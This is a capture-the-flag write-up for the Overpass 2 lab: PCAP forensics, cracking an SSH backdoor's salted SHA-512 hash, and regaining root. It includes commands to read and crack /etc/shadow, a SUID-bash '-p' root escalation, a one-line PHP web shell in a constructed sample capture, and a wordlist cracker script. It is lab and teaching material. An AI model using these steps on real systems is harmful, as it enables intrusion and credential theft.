Overpass 2 - Hacked

Tasks:

  1. Forensics - Analyse the PCAP:

    1. Download the pcap file and open it in Wireshark.
    2. Follow the HTTP stream (Analyze > Follow > HTTP Stream) and answer the questions about the URL the shell was uploaded to and the payload that was used.
    3. Follow the TCP stream of the reverse shell to get the commands the attacker ran and answer the related questions.
    4. From those commands you can see that the attacker logged in as the user james with the password whenevernoteartinstant.
    5. The attacker then used ssh-backdoor to establish persistence.
    6. In the same TCP stream the attacker ran cat /etc/shadow. Copy the username and password hash from that output into a file and crack it with John the Ripper and the fasttrack wordlist (on Kali: john --wordlist=/usr/share/wordlists/fasttrack.txt hash.txt) to complete this task.
  2. Research - Analyse the code:

    1. Go to the ssh-backdoor repository and analyse the code in main.go: it has a hardcoded default hash and salt.
    2. While following the TCP stream in the PCAP we saw that the attacker ran ./backdoor -a 6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed to start the backdoor with a hash of their own choosing and run it as a service on port 2222.
    3. Use the hash above together with the hardcoded salt from main.go and crack it with hashcat. main.go hashes passwords as sha512(password + salt), so the hashcat mode is 1710 (sha512($pass.$salt)) and the input line has the form hash:salt, e.g. hashcat -m 1710 hash.txt wordlist. The backdoor password is november16.
  3. Attack - Get back in!:

    1. Log in as james over SSH on port 2222 with the password obtained above (ssh -p 2222 james@<target-ip>).
    2. cat /home/james/user.txt and submit the user flag.
    3. Search for SUID binaries with find / -perm -u=s -type f 2>/dev/null; .suid_bash stands out in the list, since a hidden file with the SUID bit set is not part of a normal install.
    4. .suid_bash is a copy of the bash binary with the SUID bit set. Run it with the -p flag (./.suid_bash -p): in privileged mode bash does not drop the effective UID back to the real UID, so you get a root shell (this is the SUID entry for bash on GTFOBins).
    5. cat /root/root.txt and submit the root flag.
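
The forensics steps above (follow the HTTP stream for the upload, follow the TCP stream for the attacker's commands) boil down to reassembling each direction of a TCP connection by sequence number. The script below is an added example, not part of this writeup or of the Overpass 2 room, that does exactly that on a classic pcap using only the standard library. The capture it parses is constructed inside the script (made-up IPs, a made-up upload URI and filename, and made-up reverse-shell commands); it is not the room's pcap, and the sample's reverse-shell segments are deliberately written out of order to show the reordering.

```python
"""Follow the HTTP and TCP streams of a pcap without Wireshark (added example).

Reassembles each TCP direction by sequence number, then pulls out what the
room's questions ask for: the upload URI and filename from the POST request,
and the lines the attacker typed into the reverse shell.
"""
import re
import struct
from collections import defaultdict

PCAP_MAGIC = 0xA1B2C3D4  # little-endian classic pcap, microsecond timestamps


def tcp_streams(pcap_bytes):
    """Return {(src, sport, dst, dport): payload} with segments ordered by seq.

    Only IPv4/TCP over Ethernet is handled; checksums are not verified and a
    retransmission simply overwrites the earlier copy of the same seq.
    """
    if struct.unpack_from("<I", pcap_bytes, 0)[0] != PCAP_MAGIC:
        raise ValueError("not a little-endian pcap file")
    segments = defaultdict(dict)
    off = 24  # skip the global header
    while off + 16 <= len(pcap_bytes):
        _, _, incl_len, _ = struct.unpack_from("<IIII", pcap_bytes, off)
        frame = pcap_bytes[off + 16:off + 16 + incl_len]
        off += 16 + incl_len
        if len(frame) < 34 or struct.unpack_from("!H", frame, 12)[0] != 0x0800:
            continue  # not IPv4
        ip = frame[14:]
        ihl = (ip[0] & 0x0F) * 4
        if ip[9] != 6:
            continue  # not TCP
        total_len = struct.unpack_from("!H", ip, 2)[0]
        src = ".".join(map(str, ip[12:16]))
        dst = ".".join(map(str, ip[16:20]))
        tcp = ip[ihl:total_len]
        sport, dport, seq = struct.unpack_from("!HHI", tcp, 0)
        data_off = (tcp[12] >> 4) * 4
        payload = tcp[data_off:]
        if payload:
            segments[(src, sport, dst, dport)][seq] = payload
    return {key: b"".join(segs[s] for s in sorted(segs))
            for key, segs in segments.items()}


def find_upload(streams):
    """(request URI, uploaded filename) of the first multipart POST, or None."""
    for data in streams.values():
        if data.startswith(b"POST "):
            uri = data.split(b" ", 2)[1].decode()
            m = re.search(rb'filename="([^"]+)"', data)
            return uri, (m.group(1).decode() if m else None)
    return None


def typed_commands(streams, attacker_ip, listener_port):
    """Lines sent from the attacker's listener to the victim, i.e. the
    commands typed into a reverse shell."""
    for (src, sport, _dst, _dport), data in streams.items():
        if src == attacker_ip and sport == listener_port:
            return [line.decode(errors="replace") for line in data.split(b"\n") if line]
    return []


# --- constructed sample capture (not the room's pcap) -------------------------

def _frame(src, sport, dst, dport, seq, payload):
    """One Ethernet/IPv4/TCP frame; checksums left zero since tcp_streams() ignores them."""
    eth = b"\x00" * 12 + struct.pack("!H", 0x0800)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40 + len(payload), 0, 0, 64, 6, 0,
                     bytes(map(int, src.split("."))), bytes(map(int, dst.split("."))))
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, 0, 5 << 4, 0x18, 65535, 0, 0)
    return eth + ip + tcp + payload


def demo_pcap():
    """Constructed capture: a web-shell upload, then a reverse shell. IPs, URI,
    filename and commands are made up for this demo."""
    victim, attacker = "10.10.10.5", "10.10.10.99"
    post = (b"POST /upload.php HTTP/1.1\r\nHost: 10.10.10.5\r\n"
            b"Content-Type: multipart/form-data; boundary=X\r\n\r\n--X\r\n"
            b'Content-Disposition: form-data; name="file"; filename="shell.php"\r\n\r\n'
            b"<?php system($_GET['cmd']); ?>\r\n--X--\r\n")
    frames = [
        _frame(attacker, 51000, victim, 80, 1, post),
        _frame(victim, 80, attacker, 51000, 1, b"HTTP/1.1 200 OK\r\n\r\nuploaded\r\n"),
        # reverse shell: commands flow from the attacker's listener (4444) to the victim;
        # the two segments are deliberately out of order to exercise seq reassembly
        _frame(attacker, 4444, victim, 40000, 108, b"cat /etc/shadow\n"),
        _frame(attacker, 4444, victim, 40000, 101, b"whoami\n"),
        _frame(victim, 40000, attacker, 4444, 200, b"www-data\nroot:*:18000:0:99999:7:::\n"),
    ]
    body = b"".join(struct.pack("<IIII", i, 0, len(f), len(f)) + f for i, f in enumerate(frames))
    return struct.pack("<IHHiIII", PCAP_MAGIC, 2, 4, 0, 0, 65535, 1) + body


if __name__ == "__main__":
    streams = tcp_streams(demo_pcap())
    print("upload:", find_upload(streams))
    print("attacker typed:", typed_commands(streams, "10.10.10.99", 4444))
```

To use it on a real capture, read the file into bytes and pass it to tcp_streams(); a pcapng file (Wireshark's default save format) must first be converted, e.g. with editcap -F pcap. Keying streams per direction is what lets you separate the attacker's typed commands from the victim's output, which is the same split Wireshark shows in two colours in Follow TCP Stream.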

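The research step (cracking the hash the attacker passed to ./backdoor -a with the salt from main.go) depends on one detail: in which order the backdoor concatenates password and salt before SHA-512, because that decides between hashcat modes 1710 and 1720. The script below is an added example, not code from this writeup or from the ssh-backdoor project, that mirrors the check in Python and runs a wordlist against it, trying both orders so the result also names the hashcat mode. It assumes main.go computes sha512(password + salt); the salt, hashes and wordlist in it are constructed for the demo and are not the values from main.go or the PCAP.

```python
"""Reproduce the ssh-backdoor password check and run a wordlist against it (added example)."""
import hashlib
import hmac

# hashcat mode -> how password and salt are concatenated before SHA-512.
# main.go is assumed to compute sha512(password + salt) (mode 1710); 1720 is
# kept so the cracker tells you if the source actually salts the other way round.
MODES = {
    1710: lambda password, salt: password + salt,  # sha512($pass.$salt)
    1720: lambda password, salt: salt + password,  # sha512($salt.$pass)
}


def sha512_hex(text: str) -> str:
    return hashlib.sha512(text.encode()).hexdigest()


def hash_password(password: str, salt: str, mode: int = 1710) -> str:
    """Hex digest in the form the backdoor stores it and its -a flag takes."""
    return sha512_hex(MODES[mode](password, salt))


def verify_password(password: str, salt: str, stored_hash: str, mode: int = 1710) -> bool:
    """Constant-time comparison, as a real password check should do."""
    return hmac.compare_digest(hash_password(password, salt, mode), stored_hash.lower())


def crack(stored_hash: str, salt: str, wordlist, modes=MODES):
    """Return (password, hashcat_mode) for the first candidate that matches, else None."""
    stored_hash = stored_hash.lower()
    for word in wordlist:
        word = word.strip()
        for mode in modes:
            if hash_password(word, salt, mode) == stored_hash:
                return word, mode
    return None


def hashcat_line(stored_hash: str, salt: str) -> str:
    """Input line for `hashcat -m 1710 hash.txt wordlist` (hash:salt)."""
    return f"{stored_hash}:{salt}"


# Constructed demo values: the salt is made up and the hashes are generated here.
# Neither is the salt from main.go nor the hash the attacker passed with -a.
DEMO_SALT = "0123456789abcdef0123456789abcdef"
DEMO_HASH_1710 = hash_password("november16", DEMO_SALT, 1710)
DEMO_HASH_1720 = hash_password("november16", DEMO_SALT, 1720)
DEMO_WORDLIST = ["password", "letmein", "Winter2020", "november16", "spring21"]

if __name__ == "__main__":
    print(crack(DEMO_HASH_1710, DEMO_SALT, DEMO_WORDLIST))  # ('november16', 1710)
    print(hashcat_line(DEMO_HASH_1710, DEMO_SALT))
```

For the real hash, call crack() with the hash from the PCAP, the salt copied out of main.go and the lines of your wordlist; if it reports 1720 instead of 1710, the source concatenates salt first and the hashcat command in step 3 needs that mode. hashcat_line() produces the hash:salt line that hashcat expects for either mode.
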
References:

  1. CVE-2019-18276 - bash drops privileges incorrectly when run setuid (SUID bash)
  2. GTFOBins - bash (https://gtfobins.github.io/gtfobins/bash/)
